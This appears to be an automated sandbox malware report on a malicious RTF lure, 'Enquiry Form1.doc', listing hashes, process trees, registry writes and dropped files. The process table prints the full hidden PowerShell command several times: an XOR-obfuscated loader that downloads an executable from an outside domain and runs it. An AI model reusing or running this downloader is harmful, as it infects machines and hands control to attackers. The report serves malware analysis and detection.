| File name: | Enquiry Form1.doc |
| Full analysis: | https://app.any.run/tasks/52fb65e4-11bf-4652-9be2-02d67c3416bd |
| Verdict: | Malicious activity |
| Analysis date: | January 23, 2019, 00:31:50 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/rtf |
| File info: | Rich Text Format data, version 1, unknown character set |
| MD5: | 6A102D7391A40286782C585D8471E6DA |
| SHA1: | 3F470FD1E161B916BF807A9FF5C94C00F0D7CA2F |
| SHA256: | 565E4D50913EAA942AB227393BDF0378468253419ED5438D16B69AF3A0828934 |
| SSDEEP: | 1536:oZd+cqoKSMLjHt93/0cqoKSMLjHt93/0cqoKSMLjHt93/0cqoKSMLjHt93/0cqoX:oHQoKwoKwoKwoKwoKO7 |
MALICIOUS
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 3752)
- EXCEL.EXE (PID: 2612)
- EXCEL.EXE (PID: 2576)
- EXCEL.EXE (PID: 2716)
- EXCEL.EXE (PID: 2932)
Executes PowerShell scripts
- EXCEL.EXE (PID: 3752)
- EXCEL.EXE (PID: 2612)
- EXCEL.EXE (PID: 2576)
- EXCEL.EXE (PID: 2716)
- EXCEL.EXE (PID: 2932)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 3092)
- powershell.exe (PID: 3144)
- powershell.exe (PID: 3116)
- powershell.exe (PID: 3588)
- powershell.exe (PID: 2352)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2840)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2840)
- EXCEL.EXE (PID: 3752)
- EXCEL.EXE (PID: 2612)
- EXCEL.EXE (PID: 2576)
- EXCEL.EXE (PID: 2716)
- EXCEL.EXE (PID: 2932)
- excelcnv.exe (PID: 3744)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .rtf | | | Rich Text Format (100) |
|---|
EXIF
RTF
| Author: | Admin |
|---|---|
| LastModifiedBy: | Admin |
| CreateDate: | 2019:01:07 23:54:00 |
| ModifyDate: | 2019:01:07 23:54:00 |
| RevisionNumber: | 1 |
| TotalEditTime: | - |
| Pages: | 1 |
| Words: | - |
| Characters: | 4 |
| CharactersWithSpaces: | 4 |
| InternalVersionNumber: | 57435 |
Total processes
51
Monitored processes
13
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2352 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile function ob9f28 { param($q2d41d) $lbdce = "l9533e" $b657cc = "" for ($i = 0; $i -lt $q2d41d.length; $i+=2) { $f1423 = [convert]::ToByte($q2d41d.Substring($i, 2), 16) $b657cc += [char]($f1423 -bxor $lbdce[($i / 2) % $lbdce.length]) } return $b657cc } $a3835 = ob9f28("194a5c5d54453f404647560857343f46400c025e15604a16185c581d6110024d5c5e564b25574156410a1c6a5041450c0f5c46083e6f1c4c575f5a064c5a595240164c4c500402035f343f483e6f4c19151313454c196e775f092554455c4111441b5e56410b09550601114c31343f1313454c1915131315195b595a50451f4d54475a064c5c4d47561702197c5d4735184b157456113c4b5a507201084b5040404d2557416347174c51785c5710005c191340111e505b5413151e56567d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c705b4763111e19795c520120505741521715114647410c025e155d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c5b5a5c5f453a50474746040069475c47000f4d1d7a5d113c4d47135f152d5d514156161f1515667a0b1869414113011b6a5c4956494c4c5c5d47450a557b5644351e564156501140195a46474519505b4713091c5f597c5f013c4b5a47560618100e3e39454c19151313454c62715f5f2c01495a41474d4e7250415d00000a071d5709001b1913760b184b4c635c0c024d150e13473e4d597e5c130974505e5c17151b191360001875544047201e4b5a4113584c5f545f40004564383913454c19151313451f4d54475a064c5c4d4756170219435c5a014c745a45562809545a414a4d2557416347174c5d504047494c705b4763111e19464150494c505b4713160543501a086866343f1313454c1915131315195b595a50451f4d54475a064c505b4713125b0e53070b4d45343f1313454c191513131e6133151313454c19151313454c197c5d4735184b1552045d0f5d515613584c755a525729055b4752411c4456570a5557541117035750580d03065254080904030350591b1c1a08686619151313454c19151313454c5053131b045b01565757004c0408137a0b186941411d3f094b5a1a3e6f4c19151313454c191513134517343f1313454c19151313454c19151313454c4b50474617021904083e6f4c19151313454c191513134511343f3e39454c19151313454c191513132c024d654741450f5a000204044c04157456113c4b5a507201084b5040404d0d0e0d5057010915155c515c0a0b0d1b1157080c010705500d0f05030555080c020404515a0c00030055550d57111a4c57343f1313454c19151313454c19155a5545445a560602520d19080e132c024d6547414b365c475c1a686619151313454c19151313454c42383913454c19151313454c19151313454c19475647101e57150208686619151313454c19151313454c4438393e6f4c19151313454c191513134539705b4763111e195144600c165c150e134d39705b4763111e1000083e6f4c19151313454c191513134519505b47133f094b5a130e455c02383913454c19151313454c1915135a034c1114655a17184c545f6317034d5050474d0f5a0002040440195144600c165c1913031d580919135c1018196f56410a4510383913454c19151313454c19151348686619151313454c19151313454c1915131317094d40415d455d02383913454c19151313454c1915134e686619151313454c19151313454c7b4c47563e3119655247060419081348455c4106021f455c4153551f455c410c03131857343f1313454c19151313454c19157a5d113c4d4713460b01585b52540008695a5a5d11094b150e13280d4b465b52094278595f5c06247e595c51040011061a08686619151313454c19151313454c745441400d0d551b705c15151165524706041515031f45195758525d040b5c51635c0c024d50411f455f100e3e39454c19151313454c1915131328034f507e5608034b4c1b500659080252134e4c094d0303540e1515465d080d57545456013c565c5d47001e1515001a5e6133151313454c19151313454c19475647101e57150308686619151313454c19154e3e6f653045465109055a154047041850561340111e505b54130a0e0053010b4d1f4d475a5d024c4a41417a0b45343f1313454c191513131e61333c3a3a16184b5c5d54450f0a070b50455119175f0a505f0a501108686619151313454c19151313454c4a41415a0b0b19430b05535d0007130e453f4d475a5d02427c5843471c57343f1313454c19151313454c1915555c174c115c5d474505190813035e4c50150f1316184b7c5d1d29095752475b5e4c5015180e455e10383913454c19151313454c19151348686619151313454c19151313454c1915131307154d50134b07085c01130e452f565b4556171817615c711c185c1d40471725571b6046071f4d475a5d0244501913014c401904051a5e6133151313454c19151313454c19151313451a010305025c5e191e0e134d0f5154411a4d145b5156074532195600015d0f621d5a134a4c0b1c1316450f0a070b504b205c5b54470d31100e3e39454c19151313454c19151313186133383913454c19151313454c1915134100184c475d1313540f03020a5757343f1313454c1915131318613348") Add-Type -TypeDefinition $a3835 [ue71f3]::w77f48() If (test-path $env:APPDATA + '\z1835.exe') {Remove-Item $env:APPDATA + '\z1835.exe'}; $a746b = New-Object System.Net.WebClient; $a746b.Headers['User-Agent'] = 'a746b'; $a746b.DownloadFile('https://ghigalal.com/jay22.exe', $env:APPDATA + '\z1835.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\z1835.exe'); Stop-Process -Id $Pid -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2576 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2612 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2716 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2840 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Enquiry Form1.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2932 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3092 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile function ob9f28 { param($q2d41d) $lbdce = "l9533e" $b657cc = "" for ($i = 0; $i -lt $q2d41d.length; $i+=2) { $f1423 = [convert]::ToByte($q2d41d.Substring($i, 2), 16) $b657cc += [char]($f1423 -bxor $lbdce[($i / 2) % $lbdce.length]) } return $b657cc } $a3835 = ob9f28("194a5c5d54453f404647560857343f46400c025e15604a16185c581d6110024d5c5e564b25574156410a1c6a5041450c0f5c46083e6f1c4c575f5a064c5a595240164c4c500402035f343f483e6f4c19151313454c196e775f092554455c4111441b5e56410b09550601114c31343f1313454c1915131315195b595a50451f4d54475a064c5c4d47561702197c5d4735184b157456113c4b5a507201084b5040404d2557416347174c51785c5710005c191340111e505b5413151e56567d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c705b4763111e19795c520120505741521715114647410c025e155d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c5b5a5c5f453a50474746040069475c47000f4d1d7a5d113c4d47135f152d5d514156161f1515667a0b1869414113011b6a5c4956494c4c5c5d47450a557b5644351e564156501140195a46474519505b4713091c5f597c5f013c4b5a47560618100e3e39454c19151313454c62715f5f2c01495a41474d4e7250415d00000a071d5709001b1913760b184b4c635c0c024d150e13473e4d597e5c130974505e5c17151b191360001875544047201e4b5a4113584c5f545f40004564383913454c19151313451f4d54475a064c5c4d4756170219435c5a014c745a45562809545a414a4d2557416347174c5d504047494c705b4763111e19464150494c505b4713160543501a086866343f1313454c1915131315195b595a50451f4d54475a064c505b4713125b0e53070b4d45343f1313454c191513131e6133151313454c19151313454c197c5d4735184b1552045d0f5d515613584c755a525729055b4752411c4456570a5557541117035750580d03065254080904030350591b1c1a08686619151313454c19151313454c5053131b045b01565757004c0408137a0b186941411d3f094b5a1a3e6f4c19151313454c191513134517343f1313454c19151313454c19151313454c4b50474617021904083e6f4c19151313454c191513134511343f3e39454c19151313454c191513132c024d654741450f5a000204044c04157456113c4b5a507201084b5040404d0d0e0d5057010915155c515c0a0b0d1b1157080c010705500d0f05030555080c020404515a0c00030055550d57111a4c57343f1313454c19151313454c19155a5545445a560602520d19080e132c024d6547414b365c475c1a686619151313454c19151313454c42383913454c19151313454c19151313454c19475647101e57150208686619151313454c19151313454c4438393e6f4c19151313454c191513134539705b4763111e195144600c165c150e134d39705b4763111e1000083e6f4c19151313454c191513134519505b47133f094b5a130e455c02383913454c19151313454c1915135a034c1114655a17184c545f6317034d5050474d0f5a0002040440195144600c165c1913031d580919135c1018196f56410a4510383913454c19151313454c19151348686619151313454c19151313454c1915131317094d40415d455d02383913454c19151313454c1915134e686619151313454c19151313454c7b4c47563e3119655247060419081348455c4106021f455c4153551f455c410c03131857343f1313454c19151313454c19157a5d113c4d4713460b01585b52540008695a5a5d11094b150e13280d4b465b52094278595f5c06247e595c51040011061a08686619151313454c19151313454c745441400d0d551b705c15151165524706041515031f45195758525d040b5c51635c0c024d50411f455f100e3e39454c19151313454c1915131328034f507e5608034b4c1b500659080252134e4c094d0303540e1515465d080d57545456013c565c5d47001e1515001a5e6133151313454c19151313454c19475647101e57150308686619151313454c19154e3e6f653045465109055a154047041850561340111e505b54130a0e0053010b4d1f4d475a5d024c4a41417a0b45343f1313454c191513131e61333c3a3a16184b5c5d54450f0a070b50455119175f0a505f0a501108686619151313454c19151313454c4a41415a0b0b19430b05535d0007130e453f4d475a5d02427c5843471c57343f1313454c19151313454c1915555c174c115c5d474505190813035e4c50150f1316184b7c5d1d29095752475b5e4c5015180e455e10383913454c19151313454c19151348686619151313454c19151313454c1915131307154d50134b07085c01130e452f565b4556171817615c711c185c1d40471725571b6046071f4d475a5d0244501913014c401904051a5e6133151313454c19151313454c19151313451a010305025c5e191e0e134d0f5154411a4d145b5156074532195600015d0f621d5a134a4c0b1c1316450f0a070b504b205c5b54470d31100e3e39454c19151313454c19151313186133383913454c19151313454c1915134100184c475d1313540f03020a5757343f1313454c1915131318613348") Add-Type -TypeDefinition $a3835 [ue71f3]::w77f48() If (test-path $env:APPDATA + '\z1835.exe') {Remove-Item $env:APPDATA + '\z1835.exe'}; $a746b = New-Object System.Net.WebClient; $a746b.Headers['User-Agent'] = 'a746b'; $a746b.DownloadFile('https://ghigalal.com/jay22.exe', $env:APPDATA + '\z1835.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\z1835.exe'); Stop-Process -Id $Pid -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3116 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile function ob9f28 { param($q2d41d) $lbdce = "l9533e" $b657cc = "" for ($i = 0; $i -lt $q2d41d.length; $i+=2) { $f1423 = [convert]::ToByte($q2d41d.Substring($i, 2), 16) $b657cc += [char]($f1423 -bxor $lbdce[($i / 2) % $lbdce.length]) } return $b657cc } $a3835 = ob9f28("194a5c5d54453f404647560857343f46400c025e15604a16185c581d6110024d5c5e564b25574156410a1c6a5041450c0f5c46083e6f1c4c575f5a064c5a595240164c4c500402035f343f483e6f4c19151313454c196e775f092554455c4111441b5e56410b09550601114c31343f1313454c1915131315195b595a50451f4d54475a064c5c4d47561702197c5d4735184b157456113c4b5a507201084b5040404d2557416347174c51785c5710005c191340111e505b5413151e56567d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c705b4763111e19795c520120505741521715114647410c025e155d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c5b5a5c5f453a50474746040069475c47000f4d1d7a5d113c4d47135f152d5d514156161f1515667a0b1869414113011b6a5c4956494c4c5c5d47450a557b5644351e564156501140195a46474519505b4713091c5f597c5f013c4b5a47560618100e3e39454c19151313454c62715f5f2c01495a41474d4e7250415d00000a071d5709001b1913760b184b4c635c0c024d150e13473e4d597e5c130974505e5c17151b191360001875544047201e4b5a4113584c5f545f40004564383913454c19151313451f4d54475a064c5c4d4756170219435c5a014c745a45562809545a414a4d2557416347174c5d504047494c705b4763111e19464150494c505b4713160543501a086866343f1313454c1915131315195b595a50451f4d54475a064c505b4713125b0e53070b4d45343f1313454c191513131e6133151313454c19151313454c197c5d4735184b1552045d0f5d515613584c755a525729055b4752411c4456570a5557541117035750580d03065254080904030350591b1c1a08686619151313454c19151313454c5053131b045b01565757004c0408137a0b186941411d3f094b5a1a3e6f4c19151313454c191513134517343f1313454c19151313454c19151313454c4b50474617021904083e6f4c19151313454c191513134511343f3e39454c19151313454c191513132c024d654741450f5a000204044c04157456113c4b5a507201084b5040404d0d0e0d5057010915155c515c0a0b0d1b1157080c010705500d0f05030555080c020404515a0c00030055550d57111a4c57343f1313454c19151313454c19155a5545445a560602520d19080e132c024d6547414b365c475c1a686619151313454c19151313454c42383913454c19151313454c19151313454c19475647101e57150208686619151313454c19151313454c4438393e6f4c19151313454c191513134539705b4763111e195144600c165c150e134d39705b4763111e1000083e6f4c19151313454c191513134519505b47133f094b5a130e455c02383913454c19151313454c1915135a034c1114655a17184c545f6317034d5050474d0f5a0002040440195144600c165c1913031d580919135c1018196f56410a4510383913454c19151313454c19151348686619151313454c19151313454c1915131317094d40415d455d02383913454c19151313454c1915134e686619151313454c19151313454c7b4c47563e3119655247060419081348455c4106021f455c4153551f455c410c03131857343f1313454c19151313454c19157a5d113c4d4713460b01585b52540008695a5a5d11094b150e13280d4b465b52094278595f5c06247e595c51040011061a08686619151313454c19151313454c745441400d0d551b705c15151165524706041515031f45195758525d040b5c51635c0c024d50411f455f100e3e39454c19151313454c1915131328034f507e5608034b4c1b500659080252134e4c094d0303540e1515465d080d57545456013c565c5d47001e1515001a5e6133151313454c19151313454c19475647101e57150308686619151313454c19154e3e6f653045465109055a154047041850561340111e505b54130a0e0053010b4d1f4d475a5d024c4a41417a0b45343f1313454c191513131e61333c3a3a16184b5c5d54450f0a070b50455119175f0a505f0a501108686619151313454c19151313454c4a41415a0b0b19430b05535d0007130e453f4d475a5d02427c5843471c57343f1313454c19151313454c1915555c174c115c5d474505190813035e4c50150f1316184b7c5d1d29095752475b5e4c5015180e455e10383913454c19151313454c19151348686619151313454c19151313454c1915131307154d50134b07085c01130e452f565b4556171817615c711c185c1d40471725571b6046071f4d475a5d0244501913014c401904051a5e6133151313454c19151313454c19151313451a010305025c5e191e0e134d0f5154411a4d145b5156074532195600015d0f621d5a134a4c0b1c1316450f0a070b504b205c5b54470d31100e3e39454c19151313454c19151313186133383913454c19151313454c1915134100184c475d1313540f03020a5757343f1313454c1915131318613348") Add-Type -TypeDefinition $a3835 [ue71f3]::w77f48() If (test-path $env:APPDATA + '\z1835.exe') {Remove-Item $env:APPDATA + '\z1835.exe'}; $a746b = New-Object System.Net.WebClient; $a746b.Headers['User-Agent'] = 'a746b'; $a746b.DownloadFile('https://ghigalal.com/jay22.exe', $env:APPDATA + '\z1835.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\z1835.exe'); Stop-Process -Id $Pid -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3144 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile function ob9f28 { param($q2d41d) $lbdce = "l9533e" $b657cc = "" for ($i = 0; $i -lt $q2d41d.length; $i+=2) { $f1423 = [convert]::ToByte($q2d41d.Substring($i, 2), 16) $b657cc += [char]($f1423 -bxor $lbdce[($i / 2) % $lbdce.length]) } return $b657cc } $a3835 = ob9f28("194a5c5d54453f404647560857343f46400c025e15604a16185c581d6110024d5c5e564b25574156410a1c6a5041450c0f5c46083e6f1c4c575f5a064c5a595240164c4c500402035f343f483e6f4c19151313454c196e775f092554455c4111441b5e56410b09550601114c31343f1313454c1915131315195b595a50451f4d54475a064c5c4d47561702197c5d4735184b157456113c4b5a507201084b5040404d2557416347174c51785c5710005c191340111e505b5413151e56567d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c705b4763111e19795c520120505741521715114647410c025e155d520809100e3e39454c19151313454c62715f5f2c01495a41474d4e5250415d00000a07111a386133151313454c19151343100e555c5013161858415a504509414156410b4c5b5a5c5f453a50474746040069475c47000f4d1d7a5d113c4d47135f152d5d514156161f1515667a0b1869414113011b6a5c4956494c4c5c5d47450a557b5644351e564156501140195a46474519505b4713091c5f597c5f013c4b5a47560618100e3e39454c19151313454c62715f5f2c01495a41474d4e7250415d00000a071d5709001b1913760b184b4c635c0c024d150e13473e4d597e5c130974505e5c17151b191360001875544047201e4b5a4113584c5f545f40004564383913454c19151313451f4d54475a064c5c4d4756170219435c5a014c745a45562809545a414a4d2557416347174c5d504047494c705b4763111e19464150494c505b4713160543501a086866343f1313454c1915131315195b595a50451f4d54475a064c505b4713125b0e53070b4d45343f1313454c191513131e6133151313454c19151313454c197c5d4735184b1552045d0f5d515613584c755a525729055b4752411c4456570a5557541117035750580d03065254080904030350591b1c1a08686619151313454c19151313454c5053131b045b01565757004c0408137a0b186941411d3f094b5a1a3e6f4c19151313454c191513134517343f1313454c19151313454c19151313454c4b50474617021904083e6f4c19151313454c191513134511343f3e39454c19151313454c191513132c024d654741450f5a000204044c04157456113c4b5a507201084b5040404d0d0e0d5057010915155c515c0a0b0d1b1157080c010705500d0f05030555080c020404515a0c00030055550d57111a4c57343f1313454c19151313454c19155a5545445a560602520d19080e132c024d6547414b365c475c1a686619151313454c19151313454c42383913454c19151313454c19151313454c19475647101e57150208686619151313454c19151313454c4438393e6f4c19151313454c191513134539705b4763111e195144600c165c150e134d39705b4763111e1000083e6f4c19151313454c191513134519505b47133f094b5a130e455c02383913454c19151313454c1915135a034c1114655a17184c545f6317034d5050474d0f5a0002040440195144600c165c1913031d580919135c1018196f56410a4510383913454c19151313454c19151348686619151313454c19151313454c1915131317094d40415d455d02383913454c19151313454c1915134e686619151313454c19151313454c7b4c47563e3119655247060419081348455c4106021f455c4153551f455c410c03131857343f1313454c19151313454c19157a5d113c4d4713460b01585b52540008695a5a5d11094b150e13280d4b465b52094278595f5c06247e595c51040011061a08686619151313454c19151313454c745441400d0d551b705c15151165524706041515031f45195758525d040b5c51635c0c024d50411f455f100e3e39454c19151313454c1915131328034f507e5608034b4c1b500659080252134e4c094d0303540e1515465d080d57545456013c565c5d47001e1515001a5e6133151313454c19151313454c19475647101e57150308686619151313454c19154e3e6f653045465109055a154047041850561340111e505b54130a0e0053010b4d1f4d475a5d024c4a41417a0b45343f1313454c191513131e61333c3a3a16184b5c5d54450f0a070b50455119175f0a505f0a501108686619151313454c19151313454c4a41415a0b0b19430b05535d0007130e453f4d475a5d02427c5843471c57343f1313454c19151313454c1915555c174c115c5d474505190813035e4c50150f1316184b7c5d1d29095752475b5e4c5015180e455e10383913454c19151313454c19151348686619151313454c19151313454c1915131307154d50134b07085c01130e452f565b4556171817615c711c185c1d40471725571b6046071f4d475a5d0244501913014c401904051a5e6133151313454c19151313454c19151313451a010305025c5e191e0e134d0f5154411a4d145b5156074532195600015d0f621d5a134a4c0b1c1316450f0a070b504b205c5b54470d31100e3e39454c19151313454c19151313186133383913454c19151313454c1915134100184c475d1313540f03020a5757343f1313454c1915131318613348") Add-Type -TypeDefinition $a3835 [ue71f3]::w77f48() If (test-path $env:APPDATA + '\z1835.exe') {Remove-Item $env:APPDATA + '\z1835.exe'}; $a746b = New-Object System.Net.WebClient; $a746b.Headers['User-Agent'] = 'a746b'; $a746b.DownloadFile('https://ghigalal.com/jay22.exe', $env:APPDATA + '\z1835.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\z1835.exe'); Stop-Process -Id $Pid -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3288 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
3 550
Read events
3 118
Write events
401
Delete events
31
Modification events
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ".$ |
Value: 222E2400180B0000010000000000000000000000 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1312227358 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1312227472 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1312227473 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 180B0000D8105E18B3B2D40100000000 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | w0$ |
Value: 77302400180B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | w0$ |
Value: 77302400180B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2840) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
0
Suspicious files
10
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2840 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9282.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3752 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9DAD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3092 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XRI6BTABQSD9PM9BZI4O.temp | — | |
MD5:— | SHA256:— | |||
| 2612 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB88.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3144 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\96064Z6PVGS00D21HEIC.temp | — | |
MD5:— | SHA256:— | |||
| 2576 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB5AA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVZKG7MK2A7GXI8XU6FY.temp | — | |
MD5:— | SHA256:— | |||
| 2716 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRBE26.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3588 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EMLG1YT0GZMC57PRL2OZ.temp | — | |
MD5:— | SHA256:— | |||
| 2932 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC819.tmp.cvr | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report